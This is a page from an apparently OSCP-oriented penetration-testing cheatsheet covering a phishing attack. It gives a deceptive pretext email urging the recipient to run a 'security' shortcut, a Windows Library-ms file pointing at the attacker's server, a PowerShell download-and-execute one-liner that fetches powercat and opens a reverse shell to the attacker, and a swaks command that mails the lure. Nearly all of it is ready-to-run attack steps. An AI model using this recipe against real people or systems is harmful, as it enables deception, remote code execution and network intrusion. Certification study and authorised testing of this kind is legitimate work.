OSCP Cheatsheet
  • Reference List
  • Basic
  • Methodology
    • Basic Scans
    • Service Enumeration
      • TCP: HTTP(S) - 80 / 443
      • TCP: SMB - 139 / 445
      • TCP: FTP - 21
      • TCP/UDP: DNS - 53
      • TCP: SSH - 22
      • TCP/UDP: LDAP - 389 / 636 / 3268
      • TCP/UDP: Kerberos - 88
      • UDP: SNMP - 161
      • TCP: SMTP - 25
      • TCP: RDP - 3389
      • TCP: RPC - 135 / 593
      • TCP: Evil-WinRM - 5985 / 5986
      • TCP: MYSQL - 3306
      • TCP: MSSQL - 1433
      • TCP: Confluence - 8090
    • Extras
  • File Transfer
  • KeePass Database
  • Shells
  • Enumeration
    • Linux
    • Windows
    • Git
  • Privilege Escalation
    • Linux
      • Abusing Cron Jobs
      • Abusing Password Authentication
      • Abusing Setuid Binaries and Capabilities
      • Abusing Sudo
      • Exploits
    • Windows
      • Service Binary Hijacking
      • DLL Hijacking
      • Unquoted Service Paths
      • Scheduled Tasks
      • Exploits
  • Port Forwarding
    • Linux
    • Windows
  • Attacks
    • Public Exploits
    • User Creation
    • Password Cracking
      • Custom Rules
      • Custom Password List
    • Phishing
    • SQLi
  • Active Directory
    • Enumeration
    • Attack
    • Lateral Movement
    • Persistence
Powered by GitBook
On this page
  • Preparation
  • On Kali Machine
  • On Windows Machine
  • Exploit
  • On Kali Machine
  1. Attacks

Phishing

Preparation

On Kali Machine

1

Create a webshare for target machine to send files

wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webServer
2

Create a text file named body.txt

Hey!
I checked WEBSRV1 and discovered that the previously used staging script still exists in the Git logs. I'll remove it for security reasons.

On an unrelated note, please install the new security features on your workstation. For this, download the attached file, double-click on it, and execute the configuration shortcut within. Thanks!

John

On Windows Machine

1

Create a text file named config.Library-ms

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>

<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>

<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>

<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://<Kali IP Address></url>
</simpleLocation>

</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
2

Create a shortcut that runs the following powershell command

NOTE: Right click on Desktop and select Add Shortcut

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<Kali IP Address>/powercat.ps1'); powercat -c <Kali IP Address> -p <Kali Port> -e powershell"

Exploit

On Kali Machine

1

Setup Netcat listener

2

Setup Python Server to host powercat.ps1

3

Send email using the following command

sudo swaks -t <Target EMAIL> -t <Target EMAIL> --from <Source EMAIL> --attach @config.Library-ms --server <MailServer IP Address> --body @body.txt --header "Subject: Staging Script" --suppress-data -ap
PreviousCustom Password ListNextSQLi

Last updated 22 days ago